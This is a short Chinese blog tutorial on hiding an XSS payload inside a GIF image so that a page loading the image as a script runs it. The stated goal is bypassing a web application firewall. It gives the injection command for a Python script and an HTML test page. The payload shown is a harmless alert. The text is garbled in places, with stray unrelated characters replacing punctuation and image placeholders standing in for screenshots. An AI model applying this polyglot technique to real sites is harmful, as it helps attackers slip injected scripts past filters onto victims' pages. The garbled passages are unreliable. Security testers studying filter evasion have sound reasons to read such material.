假設(shè)如果XSS的PayLoad被攔截,那么把XSS的PayLoad放到載體里面,這樣會(huì)不會(huì)Bypass呢懈玻?
一個(gè)正常的gif
圖片加上一個(gè)XSS的PayLoad丹鸿,然后通過(guò)腳本將XssPayload
注入到圖片里面:
利用Python腳本將PayLoad注入到圖片里面
python jsingif.py -i hack.gif "javascript:alert('Power_Liu')"
圖片
然后用記事本打開(kāi)圖片看看:
圖片
可以看出:圖片末尾有這樣一串代碼:*/=1;javascript:alert('Power_Liu');
為了驗(yàn)證這個(gè)XSS
是否生效,這里用到Html
測(cè)試代碼:
<html>
<head>
<title>Power_Liu—Test-XSS</title>
</head>
<body>
<img src="hack.gif"\>
<script src= "hack.gif"> </script>
</body>
</html>
</html>
打開(kāi)后的testxss.html:
圖片
script標(biāo)簽把圖片當(dāng)成JavaScript代碼執(zhí)行了缓呛,因?yàn)槲覀儼褋y碼的數(shù)據(jù)通過(guò)多行注釋/**/給注釋掉了催享,所以JavaScript會(huì)執(zhí)行我們的PayLoad,這樣可以繞過(guò)WAF
By:Power_Liu
Qq:211124332
文章地址:博客
)